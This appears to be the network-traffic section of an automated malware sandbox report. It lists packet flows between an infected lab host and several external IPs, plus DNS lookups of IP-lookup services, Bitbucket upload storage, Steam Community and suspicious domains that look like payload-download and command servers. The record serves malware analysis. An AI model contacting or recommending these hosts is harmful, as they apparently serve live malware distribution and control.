Sep 21, 2024 14:48:10.854455948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854460955 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854473114 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854477882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854482889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854499102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854515076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854520082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854532003 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854532003 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854552031 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854581118 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854629040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854635000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854648113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854651928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854656935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854662895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854676962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854681969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854684114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854693890 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854698896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854742050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854748964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854754925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854773998 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854780912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854783058 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854789019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854811907 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.857811928 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860558033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860569954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860584974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860590935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860596895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860604048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860616922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860630035 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860654116 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860722065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860728979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860739946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860747099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860757113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860763073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860769987 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860775948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860790968 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860807896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860883951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860889912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860896111 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860902071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860907078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860913992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.860920906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860925913 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860930920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860932112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860944033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860949993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.860949993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860958099 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860965967 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.860981941 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861021996 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861021996 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861037970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861044884 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861057043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861062050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861088037 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861129999 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861150980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861159086 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861166000 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861171007 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861176968 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861181974 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861187935 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861195087 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861207008 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861244917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861244917 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861275911 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861418962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861427069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861433029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861438036 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861443996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861449957 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861462116 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861466885 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861474037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861479044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861479998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861488104 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861494064 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861507893 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861520052 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861541033 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861563921 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861567020 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861574888 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861582041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861588001 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861593962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861599922 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861609936 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861618996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861620903 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861646891 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861665964 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861713886 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861723900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861731052 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861736059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861748934 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861754894 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861761093 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861766100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861779928 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861794949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861795902 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861804008 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861809969 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861816883 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861828089 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861833096 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861839056 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861845016 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861860037 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861860037 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861872911 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861877918 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861881018 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861891985 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861896038 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861903906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861910105 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861916065 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861922979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.861933947 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.861955881 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862127066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862133980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862217903 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862272024 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862278938 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862289906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862296104 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862301111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862308025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862313032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862318993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862323999 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862338066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862344980 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862355947 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862358093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862358093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862358093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862364054 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862377882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862384081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862389088 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862395048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862397909 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862401009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862406015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862420082 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862425089 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862452984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862478018 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862488985 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862495899 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862508059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862521887 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862529039 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862540007 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862545967 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862559080 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862565041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862571955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862597942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862597942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862621069 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862673044 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862679958 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862684965 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862690926 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862696886 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862714052 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862744093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862744093 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862763882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862770081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862776041 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862781048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862788916 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862795115 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862808943 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862813950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.862822056 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.862869978 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.868644953 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.868729115 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.874155045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874165058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874178886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874196053 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874202967 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874208927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874214888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874237061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874253988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874356985 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874363899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874376059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874382019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874387026 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874392986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874412060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874413967 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874418974 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874422073 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874425888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874435902 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874442101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874448061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874458075 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.874469042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874469042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874479055 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874522924 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.874674082 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.874747038 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.875195980 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875219107 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875225067 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875231028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875236988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875273943 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875287056 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875323057 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875330925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875336885 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875346899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875354052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875365973 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875370026 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875406981 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875508070 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875524998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875540972 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875551939 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875557899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875569105 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875574112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875579119 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875585079 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875586033 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875591993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875597000 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875614882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875622034 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875627995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875638962 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875639915 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875639915 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875646114 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875654936 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875659943 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875689030 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875777960 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875785112 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875796080 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875802040 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875808001 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875813961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875818968 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875823975 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875828981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875835896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.875835896 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875860929 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.875879049 CEST	49713	80	192.168.2.9	176.113.115.33

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 21, 2024 14:48:02.067099094 CEST	192.168.2.9	1.1.1.1	0xf116	Standard query (0)	api64.ipify.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:03.247287035 CEST	192.168.2.9	1.1.1.1	0x450b	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.252306938 CEST	192.168.2.9	1.1.1.1	0xfeb3	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.252635956 CEST	192.168.2.9	1.1.1.1	0x7ae4	Standard query (0)	nerv.com.pe	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:10.936475992 CEST	192.168.2.9	1.1.1.1	0x560	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:31.747805119 CEST	192.168.2.9	1.1.1.1	0x5491	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:39.046701908 CEST	192.168.2.9	1.1.1.1	0x3229	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:39.229748011 CEST	192.168.2.9	1.1.1.1	0x7737	Standard query (0)	tventyvf20pt.top	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:40.281524897 CEST	192.168.2.9	1.1.1.1	0x7737	Standard query (0)	tventyvf20pt.top	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:36.278307915 CEST	192.168.2.9	91.211.247.248	0xebba	Standard query (0)	ckmqpoy.net	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:38.721446991 CEST	192.168.2.9	1.1.1.1	0x2f05	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:49:42.531493902 CEST	192.168.2.9	1.1.1.1	0x92d1	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:14.231045008 CEST	192.168.2.9	1.1.1.1	0xa614	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:15.218400955 CEST	192.168.2.9	1.1.1.1	0xa614	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:50:16.218404055 CEST	192.168.2.9	1.1.1.1	0xa614	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 21, 2024 14:48:02.075238943 CEST	1.1.1.1	192.168.2.9	0xf116	No error (0)	api64.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:02.075238943 CEST	1.1.1.1	192.168.2.9	0xf116	No error (0)	api64.ipify.org		104.237.62.213	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:03.254807949 CEST	1.1.1.1	192.168.2.9	0x450b	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.259063005 CEST	1.1.1.1	192.168.2.9	0xfeb3	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.259063005 CEST	1.1.1.1	192.168.2.9	0xfeb3	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.259063005 CEST	1.1.1.1	192.168.2.9	0xfeb3	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Sep 21, 2024 14:48:08.476810932 CEST	1.1.1.1	192.168.2.9	0x7ae4	No error (0)	nerv.com.pe		162.241.61.218	A (IP address)	IN (0x0001)	false
